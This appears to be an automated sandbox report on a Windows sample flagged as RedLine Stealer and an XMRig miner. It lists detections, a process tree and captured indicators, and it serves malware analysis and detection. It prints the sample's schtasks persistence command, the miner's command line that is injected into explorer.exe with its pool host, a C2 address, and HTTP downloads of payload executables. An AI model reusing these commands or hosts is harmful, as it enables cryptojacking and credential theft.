Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe

Overview

General Information

Sample Name:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Analysis ID:553228
MD5:c7f9efb09db59923b3f96fd1ef2f0873
SHA1:43ee2579fef8ff0c3a5d53f3dc4306bbdf04d484
SHA256:982d4ea5fee5b8e551d40cb07272e1bcf707edff1001dd491ac614fdef1fa149
Tags:CoinMinerXMRigexe
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner RedLine Redline Clipper SilentXMRMiner Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Redline Clipper
Yara detected SilentXMRMiner
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Yara detected BitCoin Miner
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Uses known network protocols on non-standard ports
Detected Stratum mining protocol
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Sigma detected: Suspicius Add Task From User AppData Temp
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Creates driver files
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe" MD5: C7F9EFB09DB59923B3F96FD1EF2F0873)
    • AppLaunch.exe (PID: 5180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • sistem.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\sistem.exe" MD5: 14A6FC2FF495BE7077B8AA7602606BB7)
        • AppLaunch.exe (PID: 7016 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • Microsoft.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft.exe" MD5: AFA47609E27DB892A6E3597A88C5645A)
        • conhost.exe (PID: 2188 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6036 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6380 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • cmd.exe (PID: 6696 cmdline: cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • services64.exe (PID: 864 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
              • conhost.exe (PID: 6840 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                • cmd.exe (PID: 4608 cmdline: cmd" cmd /c taskkill /f /PID "6040 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • taskkill.exe (PID: 6532 cmdline: taskkill /f /PID "6040" MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
                • explorer.exe (PID: 4876 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: AFA47609E27DB892A6E3597A88C5645A)
    • conhost.exe (PID: 6012 cmdline: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 6288 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: A5D983222C60F4DCAE743F8E34806580)
        • conhost.exe (PID: 6040 cmdline: C:\Windows\System32\conhost.exe" "/sihost64 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6924 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "95.143.179.185:31334"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 124 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                9.2.AppLaunch.exe.400000.0.unpackJoeSecurity_RedlineClipperYara detected Redline ClipperJoe Security
                  27.0.explorer.exe.140000000.6.unpackPUA_WIN_XMRIG_CryptoCoin_Miner_Dec20Detects XMRIG crypto coin minersFlorian Roth
                  • 0x4d6674:$x1: xmrig.exe
                  • 0x4d6560:$x2: xmrig.com
                  • 0x4d6638:$x2: xmrig.com
                  27.0.explorer.exe.140000000.6.unpackPUA_Crypto_Mining_CommandLine_Indicators_Oct21Detects command line parameters often used by crypto mining softwareFlorian Roth
                  • 0x457915:$s01: --cpu-priority=
                  • 0x45726d:$s05: --nicehash
                  27.0.explorer.exe.140000000.6.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                  • 0x4617f1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                  Click to see the 227 entries

                  Sigma Overview

                  Bitcoin Miner:

                  barindex
                  Sigma detected: XmrigShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6840, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 , ProcessId: 4876

                  System Summary:

                  barindex
                  Sigma detected: Suspicius Add Task From User AppData TempShow sources
                  Source: Process startedAuthor: frack113: Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6036, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 6380

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeAvira: detection malicious, Label: HEUR/AGEN.1145980
                  Found malware configurationShow sources
                  Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "95.143.179.185:31334"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeVirustotal: Detection: 34%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeVirustotal: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeVirustotal: Detection: 52%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeMetadefender: Detection: 31%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeReversingLabs: Detection: 75%
                  Machine Learning detection for sampleShow sources
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeJoe Sandbox ML: detected

                  Bitcoin Miner:

                  barindex
                  Yara detected SilentXMRMinerShow sources
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Yara detected BitCoin MinerShow sources
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Yara detected Xmrig cryptocurrency minerShow sources
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e8d2d308.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.2019125ca38.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4876, type: MEMORYSTR
                  Found strings related to Crypto-MiningShow sources
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: cryptonight/0
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: stratum+tcp://
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: conhost.exe, 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Detected Stratum mining protocolShow sources
                  Source: global trafficTCP traffic: 192.168.2.4:49816 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
                  Source: global trafficTCP traffic: 192.168.2.4:49822 -> 157.90.156.89:6004 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"6059336","pass":"myminer","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

                  Networking:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\explorer.exeDomain query: mine.bmpool.org
                  Source: C:\Windows\explorer.exeNetwork Connect: 157.90.156.89 116
                  Uses known network protocols on non-standard portsShow sources
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49779
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/sistem.exe HTTP/1.1Host: 45.82.70.152:7777Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cabura-cash.pw/4545.exe HTTP/1.1Host: 45.82.70.152:7777
